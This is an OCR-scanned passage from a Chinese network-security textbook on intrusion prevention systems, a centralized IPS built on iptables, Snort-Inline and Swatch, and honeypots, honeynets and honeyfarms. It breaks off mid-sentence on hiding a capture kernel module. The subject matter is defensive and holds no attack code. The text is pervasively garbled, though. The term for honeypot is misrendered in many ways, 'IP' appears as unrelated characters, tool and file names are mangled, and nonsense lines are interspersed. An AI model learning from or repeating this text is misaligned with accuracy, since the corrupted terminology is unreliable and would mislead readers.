配 不 但 检测 攻击 行为 的 特征 ， 还 要 检查 当前 网 络 的 会 话 状态 ， 避 免 受到 欺骗 攻击 。 

协议 分 析 是 一 种 较 新 的 入 侵 检测 技术 ， 它 充分 利用 网 络 协议 的 高 度 有 序 性 ， 并 结合 让 
速 数据 包 捕捉 和 协议 分 析 ， 来 快速 检测 某 种 攻击 特征 。 协 议 分 析 正 在 逐渐 进入 成 熟 应 用 阶 
段 。 协 议 分 析 能 够 理解 不 同 协议 的 工作 原理 ， 以 此 分 析 这 些 协议 的 数据 包 ， 来 寻找 可 疑 或 
不 正常 的 访问 行为 。 协 议 分 析 不 仅仅 基于 协议 标准 (如 RFC)， 还 基于 协议 的 具体 实现 ， 这 
是 因为 很 多 协议 的 实现 偏离 了 协议 标准 。 通 过 协议 分 析 ，IPS 能 够 针对 插入 (Insertion) 与 规 
避 (Evasion) 攻 击 进行 检测 。 异 常 检测 的 误 报 率 比较 高 ，NIPS 不 将 其 作为 主要 技术 。 


3. NIPS 技术 特征 


IPS 可 以 被 看 作 是 增加 了 主动 拦截 功能 的 IDS。 以 在 线 方式 接 入 网 络 时 就 是 一 台 IPS， 
而 以 旁 路 方式 接 入 网 络 时 就 是 一 台 IDS。 但 是 ，IPS 绝 不 仅仅 是 增加 了 主动 拦截 的 功能 ， 
而 是 在 性 能 和 数据 包 的 分 析 能 力 方面 都 比 IDS 有 了 质 的 提升 。 

IPS 技术 的 四 大 特征 如 表 5-1 所 示 。 


表 5-1 IPS 技术 的 四 大 特征 


特 征 描 述 

嵌入 式 运行 只 有 以 嵌入 模式 运行 的 IPS 设备 才能 够 实现 实时 的 安全 防护 , 实时 阻拦 所 
有 可 疑 的 数据 包 ， 并 对 该 数据 流 的 剩余 部 分 进行 拦截 
IPS 必须 具有 深入 分 析 能 力 ， 以 确定 哪些 恶意 流量 已 经 被 拦截 ， 根 据 攻击 

入 

A 类 型 、 策 略 等 来 确定 哪些 流量 应 该 被 拦截 

入 侵 特征 库 高 质量 的 入 侵 特 征 库 是 IPS 高 效 运行 的 必要 条 件 ，IPS 还 应 该 定期 升级 入 
侵 特征 库 ， 并 快速 应 用 到 所 有 传感器 
IPS 必 理 ， 对 E 4 

高 效 处 理 能 力 须 具 有 高 效 处 理 数据 包 的 能 力 ， 对 整个 网 络 性 能 的 影响 保持 在 最 低 
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4. 集中 式 入 侵 防御 技术 


入 侵 防 御 系统 通过 组 合 IDS 和 防火 墙 的 功能 ， 能 有 效 解决 校园 网 的 安全 问题 。 

1) ”集中 式 IPS 网 络 拓扑 结构 

集中 式 IPS 网 络 拓扑 结构 如 图 5-21 所 示 ， 运 行 PS 的 主机 有 3 块 网 卡 ， 其 中 只 有 一 块 
网 卡 (eth2) 具 有 卫 地 址 (10.10.10.1) ， 主 要 用 于 系统 控制 。 另 外 两 块 网 卡 (eth0、eth1) 被 配置 
成 二 层 网 关 。 因 此 IPS 将 作为 网 桥 ， 对 于 其 他 网 络 设备 和 主机 是 透明 的 ， 如 图 5-21 所 示 。 


10.10.10.2 


5-21 ”集中 式 IPS 网 络 拓扑 结构 


集中 式 IPS 是 基于 二 层 网 关 技 术 ( 网 桥 ) 而 设计 的 ， 拥 有 3 块 以 太 网 网 卡 ， 其 中 eth0 与 
外 网 相连 ，ethl 与 内 网 相连 ， 接 口 eth0、ethl 均 工作 在 网 桥 模式 ， 没 有 IP 地 址 ， 这 样 不 但 
可 以 捕获 到 来 自 Intemet 的 攻击 ， 也 可 以 捕获 到 来 自 校园 网 的 攻击 ， 另 外 使 攻击 者 很 难 发 
现 IPS 的 存在 ， 因 此 不 会 发 现 他 的 攻击 正在 被 监控 。 同 时 ，IPS 还 拥有 另外 一 个 接口 eth2， 
它 有 一 个 他 地 址 (10.10.10.1), 目的 是 方便 IPS 的 远程 管理 和 IDS 规则 集 的 及 时 更 新 , 要 求 
这 个 接口 要 有 比较 高 的 安全 性 ， 只 允许 特定 了 P 地 址 和 端口 的 数据 包 通 过 。 

集中 式 IPS 是 网 关 型 设备 ， 串 接 在 网 络 的 出 口 处 能 够 发 挥 其 最 大 的 作用 ， 比 较 简单 的 
部 署 方 案 是 串 接 在 网 络 结构 中 防火 墙 的 位 置 ， 这 样 所 有 的 网 络 流 都 要 经 过 IPS。 集 中 式 IPS 
分 析 这 些 网 络 流 ， 根 据 分 析 结 果 拦 截 或 允许 网 络 流 。 

具体 设计 一 个 集中 式 IPS 涉及 的 关键 技术 有 : 数据 控制 、 数 据 捕获 和 报警 机 制 。 集 中 
式 IPS 使 用 Linux 自 带 的 卫 Tables 作为 防火 墙 ， 并 安装 了 IDS Snort、 网 络 入 侵 防护 系统 
(NIPS)Snort-Mine 和 报警 工具 Swatch 。 

(1) 数据 控制 。 

网 络 入 侵 防护 系统 Snort-Inline 是 IDS Snort 的 修改 版 ， 可 以 由 libipq 接收 来 自 iptables 
的 数据 包 ， 然 后 根据 Snort 的 规则 集 决 定 卫 Tables 对 数据 包 的 处 理 策略 ， 从 而 可 以 拦截 攻 
击 流 。 

(2) 数据 捕获 。 

数据 捕获 就 是 把 所 有 的 黑客 活动 记录 下 来 ， 然 后 通过 分 析 这 些 活动 来 了 解 黑客 入 侵 的 
工具 、 策 略 以 及 动机 。 为 了 在 不 被 黑客 发 现 的 情况 下 捕获 尽 可 能 多 的 数据 ， 并 保证 这 些 数 
据 的 完整 性 ，IPS 采取 了 防火 墙 日 志和 IDS 日 志 的 数据 捕获 机 制 。 

防火 墙 日 志 : 防火 墙 iptables 作为 数据 捕获 的 第 一 层 可 以 记录 所 有 出 入 IPS 的 连接 。 

IDS 日 志 : 通过 配置 文件 snortconf，IDS Snort 可 以 从 数据 链 路 层 收集 所 有 的 网 络 数据 
包 ， 并 以 MySQL 数据 库 或 Tep2dump 的 格式 保存 以 便于 数据 分 析 。 
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G) 报警 机 制 。 
一 旦 有 黑客 的 攻击 ,能 够 及 时 通知 管理 员 是 非常 重要 的 ,在 IPS 上 安装 监控 软件 Swatch 


来 实现 自动 报警 功能 。Swatch 通过 在 IP Tables 的 日 志文 件 中 匹配 关键 字 ， 确 定 是 否 有 黑 
客 攻击 校园 网 ， 一 旦 匹配 成 功 ，Swatch 将 会 发 送 E-mail 到 管理 员 的 邮箱 。 默 认 情 况 下 ， 
E-mail 的 内 容 包 括 攻击 发 生 的 时 间 、 源 他 地 址 、 目 的 他 地 址 和 端口 等 信息 。 


2) ”集中 式 的 缺陷 

集中 式 入 侵 防御 技术 需要 面 对 很 多 挑战 ， 其 中 主要 有 单 点 故障 、 性 能 瓶颈 、 误 报 和 漏 
报 三 点 。 

(1) 单 点 故障 。 


集中 式 入 侵 防御 系统 必须 以 嵌入 模式 工作 在 网 络 中 ， 而 这 就 可 能 造成 瓶颈 问题 或 单 点 


故障 。 如 果 IDS 出 现 故障 ， 最 坏 的 情况 也 就 是 造成 某 些 攻击 无 法 被 检测 到 ， 而 集中 式 IPS 
设备 出 现 问题 ， 就 会 严重 影响 网 络 的 正常 运转 。 如 果 集 中 式 IPS 出 现 故 障 而 关闭 ， 用 户 就 
会 面 对 一 个 由 IPS 造成 的 拒绝 服务 问题 ， 所 有 客户 都 将 无 法 访问 网 络 提供 的 服务 。 


(2) 性 能 瓶颈 。 
IPS 因为 是 旁 路 工作 ， 对 实时 性 要 求 不 高 ， 而 集中 式 IPS 串 接 在 网 络 上 ,是 基于 应 用 层 


的 检测 ， 这 意味 着 所 有 与 系统 应 用 相关 的 访问 ， 都 要 经 过 集中 式 IPS 过 滤 ， 这 样 就 要 求 必 
须 像 网 络 设备 一 样 对 数据 包 做 快速 转发 。 因 此 ， 集 中 式 IPS 需要 在 不 影响 检测 效率 的 基础 
上 做 到 高 性 能 的 转发 。 即 使 集中 式 IPS 设备 不 出 现 故 障 ， 它 仍然 是 一 个 潜在 的 网 络 瓶颈 ， 
不 仅 会 增加 滞后 时 间 ， 而 且 会 降低 网 络 的 效率 。 


(3) 误 报 和 漏 报 。 
误 报 率 和 漏 报 率 也 需要 集中 式 IPS 认真 面 对 。 在 繁忙 的 网 络 当中 ， 如 果 以 每 秒 需要 处 


理 10 条 警报 信息 来 计算 ，IPS 每 小 时 至 少 需要 处 理 36 000 条 警报 ， 一 天 就 是 864 000 条 。 
一 旦 生成 了 警报 ， 最 基本 的 要 求 就 是 集中 式 IPS 能 够 对 警报 进行 有 效 处 理 。 如 果 入 侵 特征 
编写 得 不 是 十 分 完善 ， 那 么 就 会 导致 误 报 ， 合 法 流量 有 可 能 被 意外 拦截 。 


5.3” 富 摊 、 密 网 和 写 场 


蜜 铅 可 被 看 成 是 情报 收集 系统 ， 是 故意 让 人 攻击 的 目标 ， 引 诱 黑客 前 来 攻击 。 其 功能 


是 对 系统 中 所 有 操作 和 行为 进行 监视 和 记录 ， 网 络 安全 专家 可 以 通过 精心 的 伪装 ， 使 得 黑 
客 在 进入 到 目标 系统 后 仍 不 知道 自己 所 有 的 行为 已 经 处 于 系统 的 监视 下 。 蜜 网 是 在 蜜 钠 技 
术 上 逐步 发 展 起 来 的 一 个 新 的 概念 ， 又 可 成 为 诱捕 网 络 。 蜜 网 技术 实质 上 还 是 一 类 研究 型 
的 高 交互 密 钢 技术， 其 主要 目的 是 收集 黑客 的 攻击 信息 。 但 与 传统 蜜 久 技术 的 差异 在 于 ， 
蜜 网 构成 了 一 个 黑客 诱捕 网 络 体系 架构 ， 在 这 个 架构 中 ， 包 含 一 个 或 多 个 蜜 链 ， 同 时 保证 
了 网 络 的 高 度 可 控 性 ， 以 及 提供 多 种 工具 以 方便 对 攻击 信息 的 采集 和 分 析 。 蜜 场 技术 则 是 
将 蜜 缸 用 于 直接 防护 大 型 的 目标 网 络 ， 即 在 安全 操作 中 心 部 署 蜜 镑 ， 在 各 个 内 部 子 网 或 关 
键 主机 上 设置 一 系列 的 重 定向 器 (Redirector)， 若 检测 到 目前 的 网 络 数 据 流 或 者 系列 活动 是 


攻 玫 


f 者 所 发 起 时 ， 则 将 蜜 场 中 的 某 台 蜜 把 动态 配置 成 与 目标 机 相似 的 环境 ， 并 通过 重 定向 


器 将 攻击 者 数据 流 重 定向 到 这 台 蜜 氨 上 ， 并 由 在 蜜 场 中 已 部 署 的 一 系列 数据 捕获 和 数据 分 


析 了 


[ 具 对 攻击 行为 进行 收集 、 分 析 和 记录 。 蜜 场 模型 的 优越 性 在 于 其 集中 性 ， 是 由 安全 专 


业 研 究 和 管理 人 员 进 行 部 署 、 维 护 和 管理 ， 并 形成 了 一 套 规范 化 的 攻击 捕获 、 分 析 和 控制 
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流程 。 
5.3.1 密 镀 


1. 蜜 镀 概述 


蜜 缸 (Honeypob) 是 一 种 主动 安全 技术 。 蜜 缸 与 入 侵 检测 系统 有 着 紧密 的 联系 ,， 它 设置 了 
专门 让 黑客 攻击 的 应 用 系统 以 记录 黑客 的 活动 ， 让 黑客 来 告诉 我 们 所 面临 的 威胁 。 分 析 蜜 
镀 采 集 的 信息 ， 可 以 了 解 黑 客 攻 击 的 方式 和 手段 ， 发 现 威胁 所 在 。 蜜 锐 为 我 们 提供 了 一 个 
丰富 的 认识 黑客 攻击 手段 的 信息 源 。 

蜜 钠 系 统 可 以 利用 远程 日 志 服务 器 来 记录 系统 日 志 信 息 ， 但 黑客 侵入 系统 后 ， 往 往 要 
破坏 掉 系统 日 志 ， 因 此 需要 使 用 非常 规 的 数据 采集 方法 记录 黑客 在 蜜 缸 内 的 活动 ， 例 如 使 
用 更 改 的 shell 程序 记录 黑客 的 攻击 ， 或 开发 专门 的 内 核 模块 采集 攻击 信息 。 在 蜜 缸 上 采集 
到 的 信息 一 般 还 需要 传递 到 远 地 保 存 。 由 于 受 隐蔽 性 限制 ， 蜜 缸 系 统 采集 信息 的 手段 并 不 
是 很 丰富 ， 因 此 ， 在 信息 采集 的 完整 性 方面 还 有 很 大 的 潜力 可 挖 。 

具体 来 讲 ， 蜜 镀 系 统 最 为 重要 的 功能 是 对 系统 中 所 有 操作 和 行为 进行 监视 和 记录 ， 网 
络 安全 专家 通过 精心 的 伪装 ， 使 得 攻击 者 在 进入 目标 系统 后 仍 不 知道 自己 所 有 的 行为 已 经 
处 于 系统 的 监视 下 。 为 了 吸引 攻击 者 ， 通 常 在 蜜 铅 系 统 上 留 下 一 些 安全 后 门 以 吸引 攻击 者 
上 钧 ， 或 者 放置 一 些 网 络 攻 击 者 希望 得 到 的 敏感 信息 ， 当 然 这 些 信息 都 是 虚假 的 信息 。 另 
外 一 些 密 镀 系统 对 攻击 者 的 聊天 内 容 进 行 记录 ， 管 理 员 通过 研究 和 分 析 这 些 记 录 ， 可 以 得 
到 攻击 者 采用 的 攻击 工具 、 攻 击 手段 、 攻 击 目的 和 攻击 水 平等 信息 ， 还 能 对 攻击 者 的 活动 
范围 以 及 下 一 个 攻击 目标 进行 了 解 。 同 时 ， 这 些 信息 将 会 成 为 对 攻击 者 进行 起 诉 的 证 据 。 

蜜 缸 系统 不 仅 是 一 个 对 其 他 系统 和 应 用 的 仿真 ， 还 可 以 创建 一 个 监禁 环境 将 攻击 者 困 
在 其 中 ， 它 也 是 一 个 标准 的 产品 系统 。 无 论 使 用 者 如 何 建立 和 使 用 蜜 缸 ， 只 有 蜜 缸 系统 受 
到 攻击 时 它 的 作用 才能 发 挥 出 来 。 


2. 寞 色 的 分 类 


从 计算 机 首次 互联 以 来 ， 研 究 人 员 和 安全 专家 就 一 直 使 用 着 各 种 各 样 的 蜜 钢 工 具 ， 根 
据 不 同 的 标准 可 以 对 蜜 馈 技 术 进 行 不 同 的 分 类 。 但 是 ， 可 以 肯定 的 是 ， 蜜 钢 技 术 并 不 会 普 
代 其 他 安全 工具 ， 例 如 防火 墙 、 系 统 侦 听 等 。 

1) 根据 设计 目的 分 类 

根据 设计 目的 可 分 为 产品 型 蜜 缸 和 研究 型 蜜 缸 两 类 。 

(1) 产品 型 蜜 镀 。 

这 类 蜜 钢 一 般 运 用 于 商业 组 织 的 网 络 中 ， 它 的 目的 是 减轻 组 织 受到 的 攻击 威胁 ， 加 强 
受 保护 组 织 的 安全 措施 。 需 要 做 的 工作 就 是 检测 并 且 对 付 恶意 的 攻击 者 。 

Q@ 这 类 蜜 钢 在 防护 中 所 做 的 贡献 很 少 , 因为 蜜 缸 不 会 将 那些 试图 攻击 的 入 侵 者 拒 之 门 
外 。 此 类 蜜 镀 设计 的 初衷 就 是 妥协 ， 所 以 它 不 会 将 入 侵 者 拒绝 在 系统 之 外 ， 实 际 上 ， 蜜 饶 
是 希望 有 人 闻 入 系统 ， 从 而 进行 各 项 记录 和 分 析 工 作 。 

@ 虽然 蜜 久 的 防护 功能 很 弱 , 但 是 它 却 具 有 很 强 的 检测 功能 ， 对 于 许多 组 织 而 言 ， 想 
要 从 大 量 的 系统 日 志 中 检测 出 可 疑 的 行为 是 非常 困难 的 。 虽然 ， 有 入 侵 检测 系统 (QDS) 的 存 


中 由 萝 二 章 ， 安 会 访 芒 拖 入 在 花 油 


在 ， 但 是 ，IDS 发 生 的 误 报 和 漏 报 ， 让 系统 管理 员 首 于 处 理 各 种 警告 和 误 报 。 而 蜜 缸 的 作 
用 体现 在 误 报 率 远 远 低 于 大 部 分 IDS 工具 ， 也 无 须 担 心 特征 数据 库 的 更 新 和 检测 引擎 的 修 
改 。 因 为 蜜 缸 没有 任何 有 效 行为 ， 从 原理 上 来 讲 ， 任 何 连接 到 蜜 缸 的 连接 都 应 该 是 侦 听 、 
扫描 或 者 攻击 的 一 种 ， 这 样 就 可 以 极 大 地 降低 误 报 率 和 漏 报 率 ， 从 而 简化 检测 的 过 程 。 从 
这 个 意义 上 来 讲 ， 蜜 镀 已 经 成 为 一 个 越 来 越 复 杂 的 安全 检测 工具 了 。 

图 如 果 组 织 内 的 系统 已 经 被 入 侵 , 那些 发 生 事故 的 系统 不 能 进行 脱 机 工作 ,就 会 导致 
系统 提供 的 所 有 产品 服务 都 将 被 停止 同时， 系统 管理 员 也 不 能 进行 合适 的 鉴定 和 分 析 ， 
而 蜜 缸 可 以 对 入 侵 进行 响应 ， 它 提供 了 一 个 具有 低 数据 污染 的 系统 和 牺牲 系统 ， 可 以 随时 
进行 脱 机 工作 。 此 时 ， 系 统管 理 员 可 以 对 脱 机 的 系统 进行 分 析 ， 并 且 把 分 析 的 结果 和 经 验 
运用 于 以 后 的 系统 中 。 

(2) 研究 型 蜜 缸 。 

这 类 蜜 缸 专门 为 研究 和 获取 攻击 信息 而 设计 ， 它 本 身 并 没有 增强 特定 组 织 的 安全 性 ， 
恰恰 相反 ， 它 要 做 的 是 让 研究 组 织 面 对 各 类 网 络 威胁 ， 并 寻找 能 够 对 付 这 些 威胁 更 好 的 方 
式 。 这 类 蜜 色 一 般 运 用 于 军队 及 安全 研究 组 织 。 

2) 根据 交互 类 型 分 类 

根据 交互 类 型 可 分 为 三 类 : 低 交互 蜜 缸 、 中 交互 密 缸 和 高 交互 蜜 缸 ， 同 时 这 也 体现 了 
蜜 饶 发 展 的 三 个 过 程 。 

(1) 低 交 互 蜜 缸 最 大 的 特点 是 模拟 。 蜜 饶 为 攻击 者 展示 的 所 有 攻击 弱点 和 攻击 对 象 都 
不 是 真正 的 产品 系统 ， 而 是 对 各 种 系统 及 其 提供 的 服务 的 模拟 。 由 于 它 的 服务 都 是 模拟 的 
行为 ， 所 以 蜜 缸 可 以 获得 的 信息 非常 有 限 ， 只 能 对 攻击 者 进行 简单 的 应 答 ， 它 是 最 安全 的 
蜜 饶 类 型 。 

(2) 中 交互 蜜 缸 是 对 真正 的 操作 系统 的 各 种 行为 的 模拟 ， 它 提供 了 更 多 的 交互 信息 ， 
同时 也 可 以 从 攻击 者 的 行为 中 获得 更 多 的 信息 。 在 这 个 模拟 行为 的 系统 中 ， 蜜 镀 可 以 看 起 
来 和 一 个 真正 的 操作 系统 没有 区 别 。 它 们 是 比 真正 系统 还 要 诱 人 的 攻击 目标 。 

(3) 高 交互 蜜 缸 是 一 个 真实 的 操作 系统 ， 它 的 优点 是 : 对 攻击 者 来 说 ， 这 是 真实 的 操 
作 系统 ， 当 攻击 者 获得 ROOT 权限 后 ， 受 系统 、 数 据 真实 性 的 迷惑 ， 他 的 更 多 活动 和 行为 
将 被 记录 下 来 。 缺 点 是 被 入 侵 的 可 能 性 很 高 ， 如 果 整 个 高 蜜 久 被 入 侵 ， 那 么 它 就 会 成 为 攻 
击 者 进行 下 一 步 攻 击 的 跳板 。 目 前 在 国内 外 的 主要 蜜 缸 产品 有 DTK、 空 系统 、BOF、 
SPECTER、HOME-MADE 密 铅 、HONEYD、SMOKEDETECTOR、BIGEYE、LABREA 
TARPIT、NETFACADE、KFSENSOR、TINY 蜜 铅 、MANTRAP、HONEYNET 等 十 四 种 。 

3) 根据 实现 技术 分 类 

根据 实现 技术 可 分 为 真实 蜜 负 和 虚拟 密 色 两 类 。 

(1) 真实 蜜 缸 。 

真实 蜜 镀 是 由 真实 的 主机 、 操 作 系 统 和 应 用 程序 构建 的 。 它 提供 真实 的 操作 系统 和 网 
络 服务 ， 没 有 任何 的 模拟 ， 比 如 一 个 运行 FTP 服务 器 的 Linux 操作 系统 ， 就 必须 构造 一 个 
真实 的 Linux 系统 来 运行 FTP 服务 器 。 

这 种 蜜 缸 有 两 个 优点 。 

Q@ 能 捕获 较 多 的 攻击 信息 。 通 过 使 用 一 个 真实 的 系统 与 黑客 进行 交互 ， 就 能 够 获取 他 
们 整个 攻击 过 程 的 信息 ， 无 论 是 新 的 攻击 工具 或 是 网 上 在 线 的 通话 信息 ， 都 可 以 获得 。 
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@ 它 不 需要 预先 设想 黑客 将 会 采用 什么 方式 入 侵 。 它 提供 一 个 开放 的 环境 ,以 便 捕获 
黑客 所 有 的 行为 。 这 样 使 得 真实 蜜 镀 能 够 很 容易 地 检测 新 的 攻击 工具 和 发 现 新 的 攻击 行为 。 
然而 ， 真 实 蜜 缸 风险 较 高 ， 维 护 较 难 ， 容 易 被 黑客 攻陷 用 来 作为 新 的 攻击 据点 。 

真实 蜜 缸 虽然 可 以 检测 攻击 行为 ， 但 主要 用 于 获取 攻击 行为 ， 是 研究 型 蜜 缸 。 这 种 蜜 
镀 与 攻击 者 的 交互 程度 高 ， 属 于 高 交互 蜜 镀 。 真 实 蜜 缸 用 于 引诱 并 将 入 侵 者 牵制 在 网 络 上 ， 
从 而 可 以 将 攻击 从 重要 系统 上 引 开 ， 并 同时 让 安全 专家 研究 了 解 在 网 络 上 发 生 了 什么 。 在 
防范 内 部 攻击 时 ， 它 被 部 署 在 数据 服务 器 的 旁边 ; 在 防范 外 部 攻击 时 ， 它 被 布置 在 防火 
墙 外 。 

由 于 真实 蜜 缸 允许 黑客 自由 活动 ， 黑 客 攻陷 蜜 缸 后 ， 完 全 可 以 把 它 作 为 跳板 对 第 三 方 
发 起 攻击 ， 从 而 带 来 了 较 高 的 风险 ;而 且 单一 的 密 锐 的 缺点 是 ， 收 集 的 攻击 信息 很 有 限 。 
为 了 检测 攻击 行为 ， 降 低 网 络 风险 ， 通 常 采 用 虚拟 蜜 缸 。 

(2) 虚拟 密 缸 。 

虚拟 蜜 缸 是 由 虚拟 的 操作 系统 和 应 用 程序 构建 的 ， 虚 拟 的 操作 系统 和 网 络 服务 能 够 对 
黑客 的 攻击 行为 做 出 回应 ， 从 而 欺骗 黑客 ， 黑 客 的 行为 只 能 局 限 在 模拟 的 级 别 。 虚 拟 蜜 缸 
又 可 以 分 为 手写 脚本 的 蜜 链 和 学 习 服务 的 蜜 缸 。 学 习 服 务 的 蜜 缸 比 手写 脚本 的 蜜 缸 有 着 更 
广阔 的 应 用 前 景 ， 但 是 实现 难度 很 高 。 

@ 手写 脚本 的 蜜 饶 , 建立 在 真实 系统 基础 之 上 , 手工 编写 脚本 , 模拟 一 个 真实 的 系统 。 

@ 学 习 服 务 的 蜜 缸 ， 建 立 在 真实 系统 基础 之 上 ， 通 过 机 器 学 习 由 系统 编写 脚本 ， 模 拟 
一 个 真实 的 系统 。 

虚拟 蜜 灸 通常 只 需要 安装 软件 ， 选 择 想 要 模拟 和 监控 的 服务 。 这 种 即 插 即 用 的 结构 使 
得 它 配置 起 来 比较 简易 ， 而 且 这 种 模拟 的 服务 通过 牵制 攻击 者 的 活动 降低 了 风险 ， 攻 击 者 
很 难 用 这 种 被 攻陷 的 模拟 主机 来 攻击 或 者 破坏 其 他 的 主机 系统 。 


3. 蜜 缸 的 配置 模式 


1) 诱骗 服务 

诱骗 服务 (deception service) 是 指 在 特定 的 卫 服务 端口 侦 听 并 像 应 用 服务 程序 那样 对 各 
种 网 络 请 求 进行 应 答 的 应 用 程序 。DTK 就 是 这 样 的 一 个 服务 性 产品 。DTK 吸引 攻击 者 的 诡 
计 就 是 可 执行 性 ， 但 是 它 与 攻击 者 进行 交互 的 方式 是 模仿 那些 具有 可 攻击 弱点 的 系统 进行 
的 ， 所 以 可 以 产生 的 应 答 非 常 有 限 。 在 这 个 过 程 中 对 所 有 的 行为 进行 记录 ， 同 时 提供 较为 
合理 的 应 答 ， 并 给 疤 入 系统 的 攻击 者 带 来 系统 并 不 安全 的 错觉 。 例 如 ， 当 我 们 将 诱骗 服务 
配置 为 FTP 服务 的 模式 。 当 攻击 者 连接 到 TCP/21 端口 时 , 就 会 收 到 一 个 由 蜜 镶 发 出 的 FTP 
的 标识 。 如 果 攻 击 者 认为 诱骗 服务 就 是 他 要 攻击 的 FTP， 他 就 会 采用 攻击 FTP 服务 的 方式 
进入 系统 。 这 样 ， 系 统管 理 员 便 可 以 记录 攻击 的 细节 。 

2) 弱化 系统 

弱化 系统 (weakened system) 是 没有 打上 相应 补丁 的 Windows 或 者 Linux 系统 ， 让 攻击 
者 更 加 容易 侵入 ， 这 样 系统 就 可 以 收集 有 效 的 攻击 数据 。 但 黑客 也 会 设 陷阱 ， 获 取 计 算 机 
的 日 志和 审查 功能 ， 并 运行 其 他 额外 的 记录 系统 ， 实 现 对 日 志 记录 的 异地 存储 和 备份 。 它 
的 缺点 是 “高 维护 低 收益 ”。 因 为 ， 获 取 的 攻击 行为 可 能 毫 无 意义 。 

3) 强化 系统 

强化 系统 (hardened system) 同 弱化 系统 一 样 ， 提 供 一 个 真实 的 环境 ， 不 过 此 时 的 系统 已 
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经 武装 得 看 似 足 够 安全 。 当 攻击 者 闻 入 时 ， 密 缸 就 开始 收集 信息 ， 它 能 在 最 短 的 时 间 内 收 
集 更 多 有 效 数 据 。 用 这 种 蜜 缸 需要 系统 管理 员 具 有 更 高 的 专业 技术 。 如 果 攻 击 者 具有 更 高 
的 技术 ， 那 么 ， 他 很 可 能 取代 管理 员 对 系统 的 控制 ， 从 而 对 其 他 系统 进行 攻击 。 

4) 用 户 模式 服务 器 

用 户 模式 服务 器 (user mode serveD 实 际 上 是 一 个 用 户 进程 , 它 运 行 在 主机 上 , 并且 模拟 
成 一 个 真实 的 服务 器 。 在 真实 主机 中 , 每 个 应 用 程序 都 当 作 一 个 具有 独立 瑟 地 址 的 操作 系 
统 和 服务 的 特定 实例 。 而 用 户 模式 服务 器 这 样 一 个 进程 就 储 套 在 主机 操作 系统 的 应 用 程序 
空间 中 ， 当 Intermet 用 户 向 用 户 模式 服务 器 的 IP 地 址 发 送 请 求 ， 主 机 将 接受 请 求 并 且 转 发 
到 用 户 模式 服务 器 上 ， 这 种 模式 的 成 功 与 否 取决 于 攻击 者 的 进入 程度 和 受骗 程度 。 它 的 优 
点 体现 在 系统 管理 员 对 用 户主 机 有 绝对 的 控制 权 。 即 使 蜜 缸 被 攻陷 ， 由 于 用 户 模式 服务 器 
是 一 个 用 户 进程 ,那么 系统 管理 员 只 要 关闭 该 进程 就 可 以 了 。 另 外 就 是 可 以 将 防火 墙 、IDS 
集中 于 同一 台 服务 器 上 ， 其 局 限 性 是 不 适用 于 所 有 的 操作 系统 。 

4. 传统 蜜 缸 的 局 限 性 

(1) 蜜 缸 技术 只 能 对 针对 蜜 缸 的 攻击 行为 进行 监视 和 分 析 ， 不 能 像 入 侵 检测 系统 一 样 
通过 旁 路 侦 听 等 技术 对 整个 网 络 进行 监控 。 

(2) 蜜 缸 技术 不 能 直接 防护 有 漏洞 的 信息 系统 ， 并 有 可 能 被 攻击 者 利用 带 来 一 定 的 安 
全 风险 。 

(3) 攻击 者 的 活动 在 加 密 通 道上 进行 (如 IPSece、SSH、SSL 等 )， 数 据 捕获 后 需要 花费 
时 间 破 译 ， 这 给 分 析 攻 击 行为 增加 了 困难 。 


5.3.2 ” 穴 网 


蜜 网 [Honeyneb 是 在 蜜 缸 的 基础 上 发 展 起 来 的 ， 其 实质 仍 是 一 种 蜜 缸 技术 , 但 它 与 传统 
的 蜜 缸 技术 相 比 具有 两 大 优势 : 首先 ， 蜜 网 是 一 种 高 交互 型 的 用 来 获取 广泛 的 安全 威胁 信 
息 的 蜜 缸 ， 高 交互 意味 着 蜜 网 是 用 真实 的 系统 、 应 用 程序 以 及 服务 来 与 攻击 者 进行 交互 ， 
而 与 之 相对 的 是 传统 的 低 交 互 蜜 缸 则 仅 提供 了 模拟 的 网 络 服务 。 其 次 ， 蜜 网 是 由 多 个 窗 镀 
以 及 防火 墙 、 入 侵 防 御 系统 、 系 统 行为 记录 、 自 动 报警 、 辅 助 分 析 等 一 系列 系统 和 工具 所 
组 成 的 一 整套 体系 结构 ， 这 种 体系 结构 创建 了 一 个 高 度 可 控 的 网 络 ， 使 得 安全 研究 人 员 可 
以 控制 和 监视 其 中 的 所 有 攻击 活动 ， 从 而 去 了 解 攻 击 者 的 攻击 工具 、 方 法 和 动机 。 


1. 密 网 体系 


蜜 网 是 一 个 体系 结构 ， 只 有 满足 两 个 方面 的 条 件 才能 成 功 地 部 署 一 个 蜜 网 环境 。 一 方 
面 是 可 实现 数据 控制 ， 数 据 控制 就 是 限制 攻击 者 活动 的 机 制 ， 它 可 以 降低 安全 风险 。 另 一 
方面 要 能 进行 数据 捕获 ， 数 据 捕获 就 是 监控 和 记录 所 有 攻击 者 在 蜜 网 内 部 的 活动 ， 包 括 记 
录 加 密会 话 ， 恢 复 使 用 SCP 拷贝 的 文件 ， 捕 获 远程 系统 被 记录 的 口令 ， 恢 复 使 用 受 保护 的 
二 进 制 程序 的 口令 等 。 通 过 对 这 些 捕获 的 数据 进行 分 析 ， 可 了 解 黑客 使 用 的 工具 、 策 略 以 
及 他 们 的 动机 。 这 也 正 是 蜜 缸 所 要 做 的 工作 。 
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2. 解决 方案 


1) 捕获 工具 隐藏 

(1) 隐藏 模块 。 

捕获 数据 的 工具 是 采用 模块 化 的 方式 ， 在 Linux 系统 启动 后 动态 地 加 载 到 其 内 核 ， 并 
成 为 内 核 的 一 部 分 。 当 捕获 程序 的 模块 被 加 载 到 内 核 时 ， 安 装 模 块 列表 里 就 记录 了 已 加 载 
模块 的 信息 ， 用 户 可 以 通过 内 存 里 动态 生成 的 proc 文件 系统 下 的 module 文件 查看 。 当 特 
权 用 户 root 调用 /sbin/insmod 命令 加 载 模块 时 ， 会 有 一 个 系统 调用 sys_create_ module 函数 ， 
这 个 函数 在 Linux2.4 的 源 代码 中 位 于 kemel/module.c。 它 会 将 含有 新 加 载 的 模块 信息 的 数 
据 结构 struct module 插入 到 名 为 moudle_list 的 模块 列表 中 。 

当 一 个 模块 加 载 时 ， 它 被 插入 到 一 个 单 向 列表 的 表 头 。 但 黑客 们 在 攻 入 蜜 缸 系统 后 ， 
可 以 根据 以 上 存在 的 漏洞 ， 找 出 他 们 认为 是 可 疑 的 蜜 缸 捕获 模块 并 从 内 核 印 载 模块 ， 这 样 
蜜 饶 也 就 失去 了 它 的 功能 。 为 了 不 被 黑客 发 现 ， 达 到 隐藏 模块 的 目的 ， 就 必须 在 加 载 模块 
